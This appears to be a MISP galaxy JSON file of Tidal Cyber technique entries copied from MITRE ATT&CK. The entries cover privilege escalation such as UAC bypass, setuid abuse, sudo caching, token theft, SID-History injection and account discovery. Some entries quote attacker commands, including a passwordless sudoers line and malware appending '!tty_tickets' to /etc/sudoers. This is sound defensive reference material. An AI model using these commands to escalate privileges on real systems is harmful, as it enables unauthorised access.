misp-galaxy/clusters/tidal-technique.json

12740 lines
1.3 MiB
Raw Blame History

This file contains invisible Unicode characters!

This file contains invisible Unicode characters that may be processed differently from what appears below. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to reveal hidden characters.

This file contains ambiguous Unicode characters that may be confused with others in your current locale. If your use case is intentional and legitimate, you can safely ignore this warning. Use the Escape button to highlight these characters.

{
"authors": [
"Tidal Cyber"
],
"category": "Technique",
"description": "Tidal Technique Cluster",
"name": "Tidal Technique",
"source": "https://app-api.tidalcyber.com/api/v1/technique/",
"type": "technique",
"uuid": "298b6aee-981b-4fd8-8759-a2e72ad223fa",
"values": [
{
"description": "Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.<sup>[[TechNet How UAC Works](https://app.tidalcyber.com/references/bbf8d1a3-115e-4bc8-be43-47ce3b295d45)]</sup>\n\nIf the UAC protection level of a computer is set to anything but the highest level, certain Windows programs can elevate privileges or execute some elevated [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66) objects without prompting the user through the UAC notification box.<sup>[[TechNet Inside UAC](https://app.tidalcyber.com/references/dea47af6-677a-4625-8664-adf0e6839c9f)]</sup><sup>[[MSDN COM Elevation](https://app.tidalcyber.com/references/898df7c7-4f19-40cb-a216-7b0f6c6155b3)]</sup> An example of this is use of [Rundll32](https://app.tidalcyber.com/technique/5652575d-cdb9-44ef-9c32-fff038f15444) to load a specifically crafted DLL which loads an auto-elevated [Component Object Model](https://app.tidalcyber.com/technique/8bc683db-1311-476f-8cae-45f3f89dcc66) object and performs a file operation in a protected directory which would typically require elevated access. Malicious software may also be injected into a trusted process to gain elevated privileges without prompting a user.<sup>[[Davidson Windows](https://app.tidalcyber.com/references/49af01f2-06c5-4b21-9882-901ad828ee28)]</sup>\n\nMany methods have been discovered to bypass UAC. The Github readme page for UACME contains an extensive list of methods<sup>[[Github UACMe](https://app.tidalcyber.com/references/7006d59d-3b61-4030-a680-5dac52133722)]</sup> that have been discovered and implemented, but may not be a comprehensive list of bypasses. Additional bypass methods are regularly discovered and some used in the wild, such as:\n\n* <code>eventvwr.exe</code> can auto-elevate and execute a specified binary or script.<sup>[[enigma0x3 Fileless UAC Bypass](https://app.tidalcyber.com/references/74b16ca4-9494-4f10-97c5-103a8521818f)]</sup><sup>[[Fortinet Fareit](https://app.tidalcyber.com/references/d06223d7-2d86-41c6-af23-50865a1810c0)]</sup>\n\nAnother bypass is possible through some lateral movement techniques if credentials for an account with administrator privileges are known, since UAC is a single system security mechanism, and the privilege or integrity of a process running on one system will be unknown on remote systems and default to high integrity.<sup>[[SANS UAC Bypass](https://app.tidalcyber.com/references/824739ac-633a-40e0-bb01-2bfd43714d67)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1548.002"
},
"related": [
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "5e1499a1-f1ad-4929-84e1-5d33c371c02d",
"value": "Bypass User Account Control"
},
{
"description": "Adversaries may leverage the <code>AuthorizationExecuteWithPrivileges</code> API to escalate privileges by prompting the user for credentials.<sup>[[AppleDocs AuthorizationExecuteWithPrivileges](https://app.tidalcyber.com/references/7b8875e8-5b93-4d49-a12b-2683bab2ba6e)]</sup> The purpose of this API is to give application developers an easy way to perform operations with root privileges, such as for application installation or updating. This API does not validate that the program requesting root privileges comes from a reputable source or has been maliciously modified. \n\nAlthough this API is deprecated, it still fully functions in the latest releases of macOS. When calling this API, the user will be prompted to enter their credentials but no checks on the origin or integrity of the program are made. The program calling the API may also load world writable files which can be modified to perform malicious behavior with elevated privileges.\n\nAdversaries may abuse <code>AuthorizationExecuteWithPrivileges</code> to obtain root privileges in order to install malicious software on victims and install persistence mechanisms.<sup>[[Death by 1000 installers; it's all broken!](https://app.tidalcyber.com/references/2ae99e9b-cd00-4e60-ba9e-bcc50e709e88)]</sup><sup>[[Carbon Black Shlayer Feb 2019](https://app.tidalcyber.com/references/d8212691-4a6e-49bf-bc33-740850a1189a)]</sup><sup>[[OSX Coldroot RAT](https://app.tidalcyber.com/references/5ee3a92c-df33-4ecd-b21e-7b9a4f6de227)]</sup> This technique may be combined with [Masquerading](https://app.tidalcyber.com/technique/a0adacc1-8d2a-4e0b-92c1-3766264df4fd) to trick the user into granting escalated privileges to malicious code.<sup>[[Death by 1000 installers; it's all broken!](https://app.tidalcyber.com/references/2ae99e9b-cd00-4e60-ba9e-bcc50e709e88)]</sup><sup>[[Carbon Black Shlayer Feb 2019](https://app.tidalcyber.com/references/d8212691-4a6e-49bf-bc33-740850a1189a)]</sup> This technique has also been shown to work by modifying legitimate programs present on the machine that make use of this API.<sup>[[Death by 1000 installers; it's all broken!](https://app.tidalcyber.com/references/2ae99e9b-cd00-4e60-ba9e-bcc50e709e88)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1548.004"
},
"related": [
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "fd6b86c5-535b-4532-a6d8-a57a6fb04c18",
"value": "Elevated Execution with Prompt"
},
{
"description": "An adversary may abuse configurations where an application has the setuid or setgid bits set in order to get code running in a different (and possibly more privileged) users context. On Linux or macOS, when the setuid or setgid bits are set for an application binary, the application will run with the privileges of the owning user or group respectively.<sup>[[setuid man page](https://app.tidalcyber.com/references/c07e9d6c-18f2-4246-a265-9bec7d833bba)]</sup> Normally an application is run in the current users context, regardless of which user or group owns the application. However, there are instances where programs need to be executed in an elevated context to function properly, but the user running them may not have the specific required privileges.\n\nInstead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications (i.e. [Linux and Mac File and Directory Permissions Modification](https://app.tidalcyber.com/technique/5c6687f6-3539-4268-a6a4-2b98fdeac0fb)). The <code>chmod</code> command can set these bits with bitmasking, <code>chmod 4777 [file]</code> or via shorthand naming, <code>chmod u+s [file]</code>. This will enable the setuid bit. To enable the setgid bit, <code>chmod 2775</code> and <code>chmod g+s</code> can be used.\n\nAdversaries can use this mechanism on their own malware to make sure they're able to execute in elevated contexts in the future.<sup>[[OSX Keydnap malware](https://app.tidalcyber.com/references/d43e0dd1-0946-4f49-bcc7-3ef38445eac3)]</sup> This abuse is often part of a \"shell escape\" or other actions to bypass an execution environment with restricted permissions.\n\nAlternatively, adversaries may choose to find and target vulnerable binaries with the setuid or setgid bits already enabled (i.e. [File and Directory Discovery](https://app.tidalcyber.com/technique/1492c4ba-c933-47b8-953d-6de3db8cfce8)). The setuid and setguid bits are indicated with an \"s\" instead of an \"x\" when viewing a file's attributes via <code>ls -l</code>. The <code>find</code> command can also be used to search for such files. For example, <code>find / -perm +4000 2>/dev/null</code> can be used to find files with setuid set and <code>find / -perm +2000 2>/dev/null</code> may be used for setgid. Binaries that have these bits set may then be abused by adversaries.<sup>[[GTFOBins Suid](https://app.tidalcyber.com/references/0b7d8e81-da8e-4f6a-a1b7-4ed81e441b4d)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1548.001"
},
"related": [
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "e939bc27-a2cc-4278-be9b-a794c34aacbc",
"value": "Setuid and Setgid"
},
{
"description": "Adversaries may perform sudo caching and/or use the sudoers file to elevate privileges. Adversaries may do this to execute commands as other users or spawn processes with higher privileges.\n\nWithin Linux and MacOS systems, sudo (sometimes referred to as \"superuser do\") allows users to perform commands from terminals with elevated privileges and to control who can perform these commands on the system. The <code>sudo</code> command \"allows a system administrator to delegate authority to give certain users (or groups of users) the ability to run some (or all) commands as root or another user while providing an audit trail of the commands and their arguments.\"<sup>[[sudo man page 2018](https://app.tidalcyber.com/references/659d4302-d4cf-41af-8007-aa1da0208aa0)]</sup> Since sudo was made for the system administrator, it has some useful configuration features such as a <code>timestamp_timeout</code>, which is the amount of time in minutes between instances of <code>sudo</code> before it will re-prompt for a password. This is because <code>sudo</code> has the ability to cache credentials for a period of time. Sudo creates (or touches) a file at <code>/var/db/sudo</code> with a timestamp of when sudo was last run to determine this timeout. Additionally, there is a <code>tty_tickets</code> variable that treats each new tty (terminal session) in isolation. This means that, for example, the sudo timeout of one tty will not affect another tty (you will have to type the password again).\n\nThe sudoers file, <code>/etc/sudoers</code>, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the principle of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like <code>user1 ALL=(ALL) NOPASSWD: ALL</code>.<sup>[[OSX.Dok Malware](https://app.tidalcyber.com/references/71d65081-dada-4a69-94c5-f1d8e4e151c1)]</sup> Elevated privileges are required to edit this file though.\n\nAdversaries can also abuse poor configurations of these mechanisms to escalate privileges without needing the user's password. For example, <code>/var/db/sudo</code>'s timestamp can be monitored to see if it falls within the <code>timestamp_timeout</code> range. If it does, then malware can execute sudo commands without needing to supply the user's password. Additional, if <code>tty_tickets</code> is disabled, adversaries can do this from any tty for that user.\n\nIn the wild, malware has disabled <code>tty_tickets</code> to potentially make scripting easier by issuing <code>echo \\'Defaults !tty_tickets\\' >> /etc/sudoers</code>.<sup>[[cybereason osx proton](https://app.tidalcyber.com/references/9c43d646-9ac2-43b5-80b6-9e69dcb57617)]</sup> In order for this change to be reflected, the malware also issued <code>killall Terminal</code>. As of macOS Sierra, the sudoers file has <code>tty_tickets</code> enabled by default.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1548.003"
},
"related": [
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "e082687f-d403-4246-987b-ad5f12911e4b",
"value": "Sudo and Sudo Caching"
},
{
"description": "Adversaries may abuse permission configurations that allow them to gain temporarily elevated access to cloud resources. Many cloud environments allow administrators to grant user or service accounts permission to request just-in-time access to roles, impersonate other accounts, pass roles onto resources and services, or otherwise gain short-term access to a set of privileges that may be distinct from their own. \n\nJust-in-time access is a mechanism for granting additional roles to cloud accounts in a granular, temporary manner. This allows accounts to operate with only the permissions they need on a daily basis, and to request additional permissions as necessary. Sometimes just-in-time access requests are configured to require manual approval, while other times the desired permissions are automatically granted.<sup>[[Google Cloud Just in Time Access 2023](https://app.tidalcyber.com/references/797c6051-9dff-531b-8438-d306bdf46720)]</sup><sup>[[Azure Just in Time Access 2023](https://app.tidalcyber.com/references/ee35e13f-ca39-5faf-81ae-230d33329a28)]</sup>\n\nAccount impersonation allows user or service accounts to temporarily act with the permissions of another account. For example, in GCP users with the `iam.serviceAccountTokenCreator` role can create temporary access tokens or sign arbitrary payloads with the permissions of a service account.<sup>[[Google Cloud Service Account Authentication Roles](https://app.tidalcyber.com/references/525a8afc-64e9-5cc3-9c56-95da9811da0d)]</sup> In Exchange Online, the `ApplicationImpersonation` role allows a service account to use the permissions associated with specified user accounts.<sup>[[Microsoft Impersonation and EWS in Exchange](https://app.tidalcyber.com/references/d7755dbd-0b38-5776-b63a-d792a4d027a4)]</sup> \n\nMany cloud environments also include mechanisms for users to pass roles to resources that allow them to perform tasks and authenticate to other services. While the user that creates the resource does not directly assume the role they pass to it, they may still be able to take advantage of the role's access -- for example, by configuring the resource to perform certain actions with the permissions it has been granted. In AWS, users with the `PassRole` permission can allow a service they create to assume a given role, while in GCP, users with the `iam.serviceAccountUser` role can attach a service account to a resource.<sup>[[AWS PassRole](https://app.tidalcyber.com/references/01e0c198-dd59-5dd1-b632-73cb316eafe0)]</sup><sup>[[Google Cloud Service Account Authentication Roles](https://app.tidalcyber.com/references/525a8afc-64e9-5cc3-9c56-95da9811da0d)]</sup>\n\nWhile users require specific role assignments in order to use any of these features, cloud administrators may misconfigure permissions. This could result in escalation paths that allow adversaries to gain access to resources beyond what was originally intended.<sup>[[Rhino Google Cloud Privilege Escalation](https://app.tidalcyber.com/references/55173e12-9edc-5685-ac0b-acd51617cc6e)]</sup><sup>[[Rhino Security Labs AWS Privilege Escalation](https://app.tidalcyber.com/references/693e5783-4aa1-40ce-8080-cec01c3e7b59)]</sup>\n\n**Note:** this technique is distinct from [Additional Cloud Roles](https://app.tidalcyber.com/technique/71867386-ddc2-4cdb-a0c9-7c27172c23c1), which involves assigning permanent roles to accounts rather than abusing existing permissions structures to gain temporarily elevated access to resources. However, adversaries that compromise a sufficiently privileged account may grant another account they control [Additional Cloud Roles](https://app.tidalcyber.com/technique/71867386-ddc2-4cdb-a0c9-7c27172c23c1) that would allow them to also abuse these features. This may also allow for greater stealth than would be had by directly using the highly privileged account, especially when logs do not clarify when role impersonation is taking place.<sup>[[CrowdStrike StellarParticle January 2022](https://app.tidalcyber.com/references/149c1446-d6a1-4a63-9420-def9272d6cb9)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1548.005"
},
"related": [
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "448dc009-2d3f-5480-aba3-0d80dc4336cd",
"value": "Temporary Elevated Cloud Access"
},
{
"description": "Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.",
"meta": {
"platforms": [
"Azure AD",
"Google Workspace",
"IaaS",
"Linux",
"macOS",
"Office 365",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
},
{
"dest-uuid": "5e1499a1-f1ad-4929-84e1-5d33c371c02d",
"type": "similar"
},
{
"dest-uuid": "fd6b86c5-535b-4532-a6d8-a57a6fb04c18",
"type": "similar"
},
{
"dest-uuid": "e939bc27-a2cc-4278-be9b-a794c34aacbc",
"type": "similar"
},
{
"dest-uuid": "e082687f-d403-4246-987b-ad5f12911e4b",
"type": "similar"
},
{
"dest-uuid": "448dc009-2d3f-5480-aba3-0d80dc4336cd",
"type": "similar"
}
],
"uuid": "ac7d9875-d18b-48f6-93e6-47c565f9526b",
"value": "Abuse Elevation Control Mechanism"
},
{
"description": "Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as <code>CreateProcessWithTokenW</code> and <code>runas</code>.<sup>[[Microsoft RunAs](https://app.tidalcyber.com/references/af05c12e-f9c6-421a-9a5d-0797c01ab2dc)]</sup>\n\nCreating processes with a token not associated with the current user may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used. For example, the token could be duplicated via [Token Impersonation/Theft](https://app.tidalcyber.com/technique/ab823cbf-0238-4347-a191-a90d84b978f7) or created via [Make and Impersonate Token](https://app.tidalcyber.com/technique/561da0ae-4ebc-4356-a954-338249cac31a) before being used to create a process.\n\nWhile this technique is distinct from [Token Impersonation/Theft](https://app.tidalcyber.com/technique/ab823cbf-0238-4347-a191-a90d84b978f7), the techniques can be used in conjunction where a token is duplicated and then used to create a new process.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1134.002"
},
"related": [
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "ef0e0599-6543-499d-8409-ef449da5c38a",
"value": "Create Process with Token"
},
{
"description": "Adversaries may make new tokens and impersonate users to escalate privileges and bypass access controls. For example, if an adversary has a username and password but the user is not logged onto the system the adversary can then create a logon session for the user using the `LogonUser` function. The function will return a copy of the new session's access token and the adversary can use `SetThreadToken` to assign the token to a thread.\n\nThis behavior is distinct from [Token Impersonation/Theft](https://app.tidalcyber.com/technique/ab823cbf-0238-4347-a191-a90d84b978f7) in that this refers to creating a new user token instead of stealing or duplicating an existing one.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1134.003"
},
"related": [
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "561da0ae-4ebc-4356-a954-338249cac31a",
"value": "Make and Impersonate Token"
},
{
"description": "Adversaries may spoof the parent process identifier (PPID) of a new process to evade process-monitoring defenses or to elevate privileges. New processes are typically spawned directly from their parent, or calling, process unless explicitly specified. One way of explicitly assigning the PPID of a new process is via the <code>CreateProcess</code> API call, which supports a parameter that defines the PPID to use.<sup>[[DidierStevens SelectMyParent Nov 2009](https://app.tidalcyber.com/references/1fee31b0-2d9c-4c02-b494-d3a6b80f12f3)]</sup> This functionality is used by Windows features such as User Account Control (UAC) to correctly set the PPID after a requested elevated process is spawned by SYSTEM (typically via <code>svchost.exe</code> or <code>consent.exe</code>) rather than the current user context.<sup>[[Microsoft UAC Nov 2018](https://app.tidalcyber.com/references/abda4184-18f9-4799-9c1f-3ba484473e35)]</sup>\n\nAdversaries may abuse these mechanisms to evade defenses, such as those blocking processes spawning directly from Office documents, and analysis targeting unusual/potentially malicious parent-child process relationships, such as spoofing the PPID of [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde)/[Rundll32](https://app.tidalcyber.com/technique/5652575d-cdb9-44ef-9c32-fff038f15444) to be <code>explorer.exe</code> rather than an Office document delivered as part of [Spearphishing Attachment](https://app.tidalcyber.com/technique/ba553ad4-5699-4458-ae4e-76e1faa43291).<sup>[[CounterCept PPID Spoofing Dec 2018](https://app.tidalcyber.com/references/a1fdb8db-4c5f-4fb9-a013-b232cd8471f8)]</sup> This spoofing could be executed via [Visual Basic](https://app.tidalcyber.com/technique/0340ed34-6db2-4979-bf73-2c16855867b4) within a malicious Office document or any code that can perform [Native API](https://app.tidalcyber.com/technique/1120f5ec-ef1b-4596-8d8b-a3979a766560).<sup>[[CTD PPID Spoofing Macro Mar 2019](https://app.tidalcyber.com/references/b06b72ba-dbd6-4190-941a-0cdd3d659ab6)]</sup><sup>[[CounterCept PPID Spoofing Dec 2018](https://app.tidalcyber.com/references/a1fdb8db-4c5f-4fb9-a013-b232cd8471f8)]</sup>\n\nExplicitly assigning the PPID may also enable elevated privileges given appropriate access rights to the parent process. For example, an adversary in a privileged user context (i.e. administrator) may spawn a new process and assign the parent as a process running as SYSTEM (such as <code>lsass.exe</code>), causing the new process to be elevated via the inherited access token.<sup>[[XPNSec PPID Nov 2017](https://app.tidalcyber.com/references/0dbf093e-4b54-4972-b048-2a6411037da4)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1134.004"
},
"related": [
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "449abc18-9faf-4ea6-a420-34528c28301d",
"value": "Parent PID Spoofing"
},
{
"description": "Adversaries may use SID-History Injection to escalate privileges and bypass access controls. The Windows security identifier (SID) is a unique value that identifies a user or group account. SIDs are used by Windows security in both security descriptors and access tokens. <sup>[[Microsoft SID](https://app.tidalcyber.com/references/c921c476-741e-4b49-8f94-752984adbba5)]</sup> An account can hold additional SIDs in the SID-History Active Directory attribute <sup>[[Microsoft SID-History Attribute](https://app.tidalcyber.com/references/32150673-5593-4a2c-9872-aaa96a21aa5c)]</sup>, allowing inter-operable account migration between domains (e.g., all values in SID-History are included in access tokens).\n\nWith Domain Administrator (or equivalent) rights, harvested or well-known SID values <sup>[[Microsoft Well Known SIDs Jun 2017](https://app.tidalcyber.com/references/14b344ed-bde6-4755-b59a-595edb23a210)]</sup> may be inserted into SID-History to enable impersonation of arbitrary users/groups such as Enterprise Administrators. This manipulation may result in elevated access to local resources and/or access to otherwise inaccessible domains via lateral movement techniques such as [Remote Services](https://app.tidalcyber.com/technique/30ef3f13-5e9b-4712-9adf-f0da4ef157a1), [SMB/Windows Admin Shares](https://app.tidalcyber.com/technique/bc2f2c6c-ffe7-4e78-bbac-369f6781bbdd), or [Windows Remote Management](https://app.tidalcyber.com/technique/c2866fd3-754e-4b40-897a-e73a8c1fcf7b).",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1134.005"
},
"related": [
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "dcb323f0-0fe6-4e26-9039-4f26f10cd3a5",
"value": "SID-History Injection"
},
{
"description": "Adversaries may duplicate then impersonate another user's existing token to escalate privileges and bypass access controls. For example, an adversary can duplicate an existing token using `DuplicateToken` or `DuplicateTokenEx`. The token can then be used with `ImpersonateLoggedOnUser` to allow the calling thread to impersonate a logged on user's security context, or with `SetThreadToken` to assign the impersonated token to a thread.\n\nAn adversary may perform [Token Impersonation/Theft](https://app.tidalcyber.com/technique/ab823cbf-0238-4347-a191-a90d84b978f7) when they have a specific, existing process they want to assign the duplicated token to. For example, this may be useful for when the target user has a non-network logon session on the system.\n\nWhen an adversary would instead use a duplicated token to create a new process rather than attaching to an existing process, they can additionally [Create Process with Token](https://app.tidalcyber.com/technique/ef0e0599-6543-499d-8409-ef449da5c38a) using `CreateProcessWithTokenW` or `CreateProcessAsUserW`. [Token Impersonation/Theft](https://app.tidalcyber.com/technique/ab823cbf-0238-4347-a191-a90d84b978f7) is also distinct from [Make and Impersonate Token](https://app.tidalcyber.com/technique/561da0ae-4ebc-4356-a954-338249cac31a) in that it refers to duplicating an existing token, rather than creating a new one.",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1134.001"
},
"related": [
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
}
],
"uuid": "ab823cbf-0238-4347-a191-a90d84b978f7",
"value": "Token Impersonation/Theft"
},
{
"description": "Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.\n\nAn adversary can use built-in Windows API functions to copy access tokens from existing processes; this is known as token stealing. These token can then be applied to an existing process (i.e. [Token Impersonation/Theft](https://app.tidalcyber.com/technique/ab823cbf-0238-4347-a191-a90d84b978f7)) or used to spawn a new process (i.e. [Create Process with Token](https://app.tidalcyber.com/technique/ef0e0599-6543-499d-8409-ef449da5c38a)). An adversary must already be in a privileged user context (i.e. administrator) to steal a token. However, adversaries commonly use token stealing to elevate their security context from the administrator level to the SYSTEM level. An adversary can then use a token to authenticate to a remote system as the account for that token if the account has appropriate permissions on the remote system.<sup>[[Pentestlab Token Manipulation](https://app.tidalcyber.com/references/243deb44-4d47-4c41-bd5d-262c4319cce5)]</sup>\n\nAny standard user can use the <code>runas</code> command, and the Windows API functions, to create impersonation tokens; it does not require access to an administrator account. There are also other mechanisms, such as Active Directory fields, that can be used to modify access tokens.",
"meta": {
"platforms": [
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37",
"type": "uses"
},
{
"dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726",
"type": "uses"
},
{
"dest-uuid": "ef0e0599-6543-499d-8409-ef449da5c38a",
"type": "similar"
},
{
"dest-uuid": "561da0ae-4ebc-4356-a954-338249cac31a",
"type": "similar"
},
{
"dest-uuid": "449abc18-9faf-4ea6-a420-34528c28301d",
"type": "similar"
},
{
"dest-uuid": "dcb323f0-0fe6-4e26-9039-4f26f10cd3a5",
"type": "similar"
},
{
"dest-uuid": "ab823cbf-0238-4347-a191-a90d84b978f7",
"type": "similar"
}
],
"uuid": "1423e8c1-7cbf-4cfb-a70d-b6fe8e1a8041",
"value": "Access Token Manipulation"
},
{
"description": "Adversaries may interrupt availability of system and network resources by inhibiting access to accounts utilized by legitimate users. Accounts may be deleted, locked, or manipulated (ex: changed credentials) to remove access to accounts. Adversaries may also subsequently log off and/or perform a [System Shutdown/Reboot](https://app.tidalcyber.com/technique/24787dca-6afd-4ab3-ab6c-32e9486ec418) to set malicious changes into place.<sup>[[CarbonBlack LockerGoga 2019](https://app.tidalcyber.com/references/9970063c-6df7-4638-a247-6b1102289372)]</sup><sup>[[Unit42 LockerGoga 2019](https://app.tidalcyber.com/references/8f058923-f2f7-4c0e-b90a-c7a0d5e62186)]</sup>\n\nIn Windows, [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc) utility, <code>Set-LocalUser</code> and <code>Set-ADAccountPassword</code> [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) cmdlets may be used by adversaries to modify user accounts. In Linux, the <code>passwd</code> utility may be used to change passwords. Accounts could also be disabled by Group Policy. \n\nAdversaries who use ransomware or similar attacks may first perform this and other Impact behaviors, such as [Data Destruction](https://app.tidalcyber.com/technique/e5016c2b-85fe-4e6b-917d-0dd5b441cc34) and [Defacement](https://app.tidalcyber.com/technique/9a21c7c7-cf8e-4f05-b196-86ec39653e3b), in order to impede incident response/recovery before completing the [Data Encrypted for Impact](https://app.tidalcyber.com/technique/f0c36d24-263c-4811-8784-f716c77ec6b3) objective. ",
"meta": {
"platforms": [
"Linux",
"macOS",
"Office 365",
"SaaS",
"Windows"
],
"source": "MITRE"
},
"related": [
{
"dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f",
"type": "uses"
}
],
"uuid": "847fcc8a-e74d-41e2-9f05-8d79d990cc04",
"value": "Account Access Removal"
},
{
"description": "Adversaries may attempt to get a listing of cloud accounts. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application.\n\nWith authenticated access there are several tools that can be used to find accounts. The <code>Get-MsolRoleMember</code> PowerShell cmdlet can be used to obtain account names given a role or permissions group in Office 365.<sup>[[Microsoft msolrolemember](https://app.tidalcyber.com/references/ca28494c-d834-4afc-9237-ab78dcfc427b)]</sup><sup>[[GitHub Raindance](https://app.tidalcyber.com/references/321bba10-06c6-4c4f-a3e0-318561fa0fed)]</sup> The Azure CLI (AZ CLI) also provides an interface to obtain user accounts with authenticated access to a domain. The command <code>az ad user list</code> will list all users within a domain.<sup>[[Microsoft AZ CLI](https://app.tidalcyber.com/references/cfd94553-272b-466b-becb-3859942bcaa5)]</sup><sup>[[Black Hills Red Teaming MS AD Azure, 2018](https://app.tidalcyber.com/references/48971032-8fa2-40ff-adef-e91d7109b859)]</sup> \n\nThe AWS command <code>aws iam list-users</code> may be used to obtain a list of users in the current account while <code>aws iam list-roles</code> can obtain IAM roles that have a specified path prefix.<sup>[[AWS List Roles](https://app.tidalcyber.com/references/42ff02f9-45d0-466b-a5fa-e19c8187b529)]</sup><sup>[[AWS List Users](https://app.tidalcyber.com/references/517e3d27-36da-4810-b256-3f47147b36e3)]</sup> In GCP, <code>gcloud iam service-accounts list</code> and <code>gcloud projects get-iam-policy</code> may be used to obtain a listing of service accounts and users in a project.<sup>[[Google Cloud - IAM Servie Accounts List API](https://app.tidalcyber.com/references/3ffad706-1dac-41dd-b197-06f22fec3b30)]</sup>",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1087.004"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "d76c3dde-dba5-4748-8d51-c93fc34f885e",
"value": "Cloud Account - Duplicate"
},
{
"description": "Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior such as targeting specific accounts which possess particular privileges.\n\nCommands such as <code>net user /domain</code> and <code>net group /domain</code> of the [Net](https://app.tidalcyber.com/software/c9b8522f-126d-40ff-b44e-1f46098bd8cc) utility, <code>dscacheutil -q group</code>on macOS, and <code>ldapsearch</code> on Linux can list domain users and groups. [PowerShell](https://app.tidalcyber.com/technique/6ca7838a-e8ad-43e8-9da6-15b640d1cbde) cmdlets including <code>Get-ADUser</code> and <code>Get-ADGroupMember</code> may enumerate members of Active Directory groups. ",
"meta": {
"source": "MITRE",
"technique_attack_id": "T1087.002"
},
"related": [
{
"dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa",
"type": "uses"
}
],
"uuid": "12908bde-a5eb-40a5-ae27-d93960d0bfdc",
"value": "Domain Account - Duplicate"
},
{
